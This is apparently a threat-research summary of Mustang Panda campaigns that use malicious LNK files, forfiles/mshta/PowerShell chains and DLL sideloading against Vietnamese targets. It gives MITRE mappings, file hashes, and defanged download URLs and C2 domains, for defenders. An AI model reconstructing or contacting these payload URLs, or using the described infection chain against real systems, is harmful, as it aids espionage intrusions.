Threat Research

Vietnamese Entities Targeted by China-Linked Mustang Panda in Cyber Espionage 

Cyble

Cyble researchers identified Mustang Panda campaigns using Windows shortcut (LNK) files to target Vietnamese entities with tax compliance and education-themed lures, employing multi-stage infection chains. The operations abuse legitimate tools (forfiles, PowerShell, MSHTA) and DLL sideloading to execute payloads, exfiltrate data, and maintain persistence, potentially enabling later stages like PlugX. #MustangPanda #LNK #forfiles #PowerShell #MSHTA #DLLSideloading #TaxCompliance #Education #Vietnam

Keypoints

  • CRIL observed campaigns using Windows shortcut (LNK) files associated with Mustang Panda targeting Vietnamese entities.
  • Mustang Panda is a China-based APT with potential state-affiliated activity, targeting NGOs and government/security-related sectors across multiple regions.
  • The campaigns in Vietnam focused on Tax Compliance and Education lures in May 2024 and April 2024, respectively.
  • The infection chain begins with spam emails containing attachments, often ZIP/RAR archives with malicious LNKs.
  • Threat actors embed partial lure documents inside LNKs to increase file size and evade detection.
  • Techniques include forfiles.exe abuse to run PowerShell via mshta and remote HTA files, followed by DLL sideloading and startup persistence.
  • Loader DLLs create mutexes, establish RUN persistence, and retrieve encrypted data from remote servers before communicating with C2 endpoints; PlugX is discussed as a potential subsequent stage.

MITRE Techniques

  • [T1059] Command and Scripting Interpreter – VBScript and PowerShell scripts are executed. ‘VBScript and PowerShell scripts are executed.’
  • [T1204] User Execution – Spam email with attachments initiates infection. ‘The initial infection starts with a spam email with attachments.’
  • [T1073] DLL Side-Loading – Malicious DLLs are sideloaded by legitimate applications. ‘DLL sideloading of the malicious loader file HPCustPartUI.dll using the legitimate HP.exe executable.’
  • [T1547] Boot or Logon Autostart Execution – Persistence via RUN entry and Startup mechanisms. ‘creates a RUN entry for the HP.exe file’ and related Startup Folder usage.
  • [T1060] Registry Run Keys / Startup Folder – Autorun registry entry added. ‘Autorun registry entry added.’
  • [T1036] Masquerading – Double extension is used for masquerading. ‘Double extension is used for masquerading.’
  • [T1027] Obfuscated Files or Information – Obfuscated PowerShell and VBScript are used. ‘Obfuscated PowerShell and VBScript are used.’
  • [T1082] System Information Discovery – System information is exfiltrated and sent to a remote server. ‘System information is exfiltrated and sent to a remote server.’
  • [T1087] Account Discovery – User accounts are checked in the system. ‘User accounts are checked in the system.’
  • [T1518.001] Security Software Discovery – Querying Antivirus Products. ‘Querying Antivirus Products.’
  • [T1005] Data From Local System – Crucial data from the system is exfiltrated. ‘Crucial data form system is exfiltrated.’
  • [T1041] Exfiltration Over C2 Channel – Data is sent to remote system over C2. ‘Data is sent to remote system over C&C.’

Indicators of Compromise

  • [SHA256] 47eb43acdd342d3975000f650cf656d9f0f759780d85f16d806d6b9a70f1be46 – LNK File
  • [SHA256] 9375b508e981ed792742f1f3b831ea6647191c261e0d3cd61e60645251ba7df7 – LNK File
  • [SHA256] cd10f98c2dbcc0c8fe3f0ed19efb1b2340f67b1138a55b0bb8d1e3dfb985df51 – HPCustPartUI.dll
  • [SHA256] bce44453835ce96e49046ff618749a9533c290504c3d7559b3a63969b9f3ef13 – wwlib.dll
  • [SHA256] 57ba7d5093ec54b0223e6a826f6cb5e019a353963ddbac8420036f7374b28f62 – Book.dll
  • [SHA256] 96cf65bb1ac9735c6a1100944d0f46343bb74f3a3c05bc6282271184b872198e – Vanban_8647.PDF_update.hta
  • [SHA256] fe721743a87c2f2767c031ccac337c1fb1ae5e92384738dd90c65d3b1617a341 – Vanban_8647.PDF.ps1
  • [SHA256] 0ea669d3ef2ae00f25ccb4fef4805c6fd7f9816c37afb8957b3d4ace065e1d95 – tempdata.dat
  • [SHA256] 4c805f281923ffc2214f4fe48f31ea392b13b710969a18ad6b6b561744cd3875 – init.txt
  • [SHA256] 968b3de170038522deae02b9b96c45cfc6a5c70fa0ddfaf29320d0d0d36aabfa – getdata.ps1
  • [URL] hxxp://mega.vlvlvlvl[.]site/Vanban_8647.PDF_update.hta – Download URL
  • [URL] hxxp://mega.vlvlvlvl[.]site/HP.exe – Download URL
  • [URL] hxxp://mega.vlvlvlvl[.]site/HPCustPartUI.dll – Download URL
  • [URL] hxxp://mega.vlvlvlvl[.]site/Vanban_8647.PDF.ps1 – Download URL
  • [URL] hxxp://payment.tripadviso[.]online/tempdata.dat – Download URL
  • [URL] hxxp://vibm[.]vn/init.txt – Download URL
  • [URL] hxxp://megacybernews[.]com/newrun.ps1 – Download URL
  • [URL] hxxp://megacybernews[.]com/getdata.ps1 – Download URL
  • [URL] hxxp://megacybernews[.]com/stage2.2.ps1 – Download URL
  • [URL] hxxp://megacybernews[.]com/checkin.php – Download URL
  • [URL] hxxp://megacybernews[.]com/book.dll – Download URL
  • [URL] hxxp://megacybernews[.]com/unikey.exe – Download URL
  • [URL] hxxp://megacybernews[.]com/wwlib.dll – Download URL
  • [Domain] mega.vlvlvlvl[.]site – C2
  • [Domain] payment.tripadviso[.]online – C2
  • [Domain] vibm[.]vn – C2
  • [Domain] megacybernews[.]com – C2

Read more: https://cyble.com/blog/vietnamese-entities-targeted-by-china-linked-mustang-panda-in-cyber-espionage/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint